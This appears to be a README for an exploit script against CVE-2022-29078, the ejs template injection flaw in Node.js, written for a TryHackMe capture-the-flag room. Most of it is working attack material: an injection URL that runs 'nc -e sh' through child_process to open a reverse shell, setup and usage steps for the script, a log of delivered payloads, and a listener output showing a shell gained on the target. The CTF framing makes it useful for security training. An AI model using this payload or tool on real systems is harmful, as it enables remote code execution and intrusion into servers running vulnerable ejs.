The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).
- 📜 Description
- 🛠️ Installation
- 💁 References
http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s$ git clone https://github.com/l0n3m4n/CVE-2022-29078.git
$ python3 -m venv venv && source venv/bin/activate && cd CVE-2022-29078
$ pip install colorama==0.4.6 && pip install requests==2.26.0 
$ python3 CVE-2022-29078.py -h
_________ ____________________.___ .__ .__ __
/ _____// _____/\__ ___/| | ____ ___ _________ | | ____ |__|/ |_
\_____ \ \_____ \ | | | |/ __ \| \/ /\____ \| | / _ \| \ __|
/ \/ \ | | | \ ___/ > < | |_> > |_( <_> ) || |
/_______ /_______ / |____| |___|\___ >__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/|__|
Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose
usage: CVE-2022-29078.py [-h] -t TARGET -u USER -p PASSWORD
Send a crafted POST request with custom URL, username, and password.
options:
-h, --help show this help message and exit
-t TARGET, --target TARGET
Target URL (e.g., http://admin.cyprusbank.thm/settings)
-u USER, --user USER Username to send in the request
-p PASSWORD, --password PASSWORD
Password to send in the request
Example: python3 exploit-ssti.py -t http://admin.cyprusbank.thm/settings -u user1 -p pa$$w0rd _________ ____________________.___ .__ .__ __
/ _____// _____/\__ ___/| | ____ ___ _________ | | ____ |__|/ |_
\_____ \ \_____ \ | | | |/ __ \| \/ /\____ \| | / _ \| \ __|
/ \/ \ | | | \ ___/ > < | |_> > |_( <_> ) || |
/_______ /_______ / |____| |___|\___ >__/\_ \| __/|____/\____/|__||__|
\/ \/ \/ \/|__|
Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose
[!] The exploit will automatically exit once we received a 504 from the server$ cat exploit-ssti.log
2024-11-06 11:22:28,919 - INFO - Payload delivered successfully.
2024-11-06 11:32:47,806 - INFO - Payload delivered successfully.
2024-11-06 11:32:58,284 - INFO - Payload delivered successfully.
2024-11-06 11:37:13,616 - INFO - Payload delivered successfully.
2024-11-06 11:55:16,861 - WARNING - Connection failed with status code: 504
2024-11-06 11:59:27,820 - WARNING - Connection failed with status code: 504$ sudo rlwrap -cAr nc -lvnp 443
[sudo] password for l0n3m4n:
listening on [any] 443 ...
connect to [10.2.4.61] from (UNKNOWN) [10.10.145.199] 38020
bash: cannot set terminal process group (1233): Inappropriate ioctl for device
bash: no job control in this shell
web@cyprusbank:~/app$